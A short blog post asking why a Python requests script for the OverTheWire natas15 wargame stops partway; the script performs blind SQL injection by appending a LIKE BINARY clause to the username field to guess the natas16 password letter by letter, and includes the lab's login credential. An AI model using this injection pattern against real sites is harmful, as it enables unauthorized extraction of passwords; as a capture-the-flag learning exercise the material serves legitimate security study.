samedi 5 décembre 2020

post in requests module dont work without exception(python)

in natas15 you must do a sql blind injection

for test i run this code to find first letter of password

import requests
from requests.auth import HTTPBasicAuth

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

for char in chars:
    Data = {'username': 'natas16" and password LIKE BINARY "' + char + '%" #'}
    r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug',
                      auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data=Data)
    print('i test:' + char)
    if 'exists' in r.text:
        print('i find: ' + char)

but it does not work it do not show any error but i find the where error come from it come from post request

here some output:

i test:a
i test:b
i test:c
i test:d

i test:a
i test:b
i test:c
i test:d
i test:e
i test:f
i test:g
i test:h
i test:i
i test:j
i test:k
i test:l
i test:m
i test:n
i test:o

(its stop working randomly)

à

Aucun commentaire:

Enregistrer un commentaire